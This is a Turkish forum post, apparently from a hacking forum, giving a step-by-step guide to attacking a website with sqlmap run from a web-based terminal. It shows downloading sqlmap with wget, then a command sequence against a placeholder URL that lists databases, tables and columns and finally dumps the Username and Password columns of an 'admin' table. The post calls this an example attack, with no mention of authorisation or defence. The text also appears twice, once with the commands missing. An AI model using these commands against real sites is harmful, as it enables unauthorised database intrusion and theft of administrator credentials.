Web Tabanlı Sqlmap Kullanımı
https://koding.com/
Bu vereceğim siteye gmail hesabınızla üye olunuz...Onay kodu falan isticek gmail den onaylicaksınız sonra ise terminal yani konsolu açıp sırayla
[video=youtube]
Sql map kullanmayı bilmiyorsanız.. .
Örnek saldırı
ENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz .. Ekrana veritabanı isimleri çıkacak onu tablesin önüne eklicez.
Örnek veritabanı ismi=thtcoadmir
Kodları düzenlersek
Ekrana tablolar yansıdı tablolardan birinin ismi admin varsayalım..
Yani düzenlersek =
Admin kolonların içindeki tabloları bulduk Bulduklarımız şunlar olsun..
+----------+--------------+
| Column | Type |
+----------+--------------+
| Password | varchar(100) |
| Username | varchar(100) |
Bunlar geldi varsayalım..
Password (Şifre) bulmak için =
Username (Kullanıcı adını) bulmak İçin =
Bunun gibi devam ettiriyoruz kodlarıı..
Kodların başına sadece python yazarak başlıyoruz gerisi aynı
Video alıntıdır..
https://koding.com/
Bu vereceğim siteye gmail hesabınızla üye olunuz...Onay kodu falan isticek gmail den onaylicaksınız sonra ise terminal yani konsolu açıp sırayla
Kod:
wget http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz
Kod:
tar xzvf sqlmap-0.9.tar.gz[video=youtube]
Sql map kullanmayı bilmiyorsanız.. .
Örnek saldırı
Kod:
cd sqlmap
Kod:
python sqlmap.py -u''http://site.com/php?id=1'' --dbsENTER tuşuna bastığımızda işleme geçiyor SQLMAP'ımız ve aşağıdaki resimde kırmızı ile bir kısım işaretledim sonuna dikkat ederseniz [Y/n] yazıyor yani Yes ? No ? diye soruyor bize öyle kısımlarda "y" yazıp ENTER tuşuna basıyoruz .. Ekrana veritabanı isimleri çıkacak onu tablesin önüne eklicez.
Örnek veritabanı ismi=thtcoadmir
Kod:
python sqlmap.py -u''http://site.com/php?id=1'' veritabanı ismi --tablesKodları düzenlersek
Kod:
python sqlmap.py -u''http://site.com/php?id=1'' thtcoadmir --tablesEkrana tablolar yansıdı tablolardan birinin ismi admin varsayalım..
Kod:
python sqlmap.py -u''http://site.com/php?id=1'' thtcoadmir -T tablo_ismi --columnsYani düzenlersek =
Kod:
python sqlmap.py -u''http://site.com/php?id=1'' thtcoadmir -T admin --columnsAdmin kolonların içindeki tabloları bulduk Bulduklarımız şunlar olsun..
+----------+--------------+
| Column | Type |
+----------+--------------+
| Password | varchar(100) |
| Username | varchar(100) |
Bunlar geldi varsayalım..
Password (Şifre) bulmak için =
Kod:
python sqlmap.py -u''http://site.com/php?id=1'' thtcoadmir -T admin -C Password --dumpUsername (Kullanıcı adını) bulmak İçin =
Kod:
python sqlmap.py -u''http://site.com/php?id=1'' thtcoadmir -T admin -C Username --dumpBunun gibi devam ettiriyoruz kodlarıı..
Kodların başına sadece python yazarak başlıyoruz gerisi aynı
Video alıntıdır..
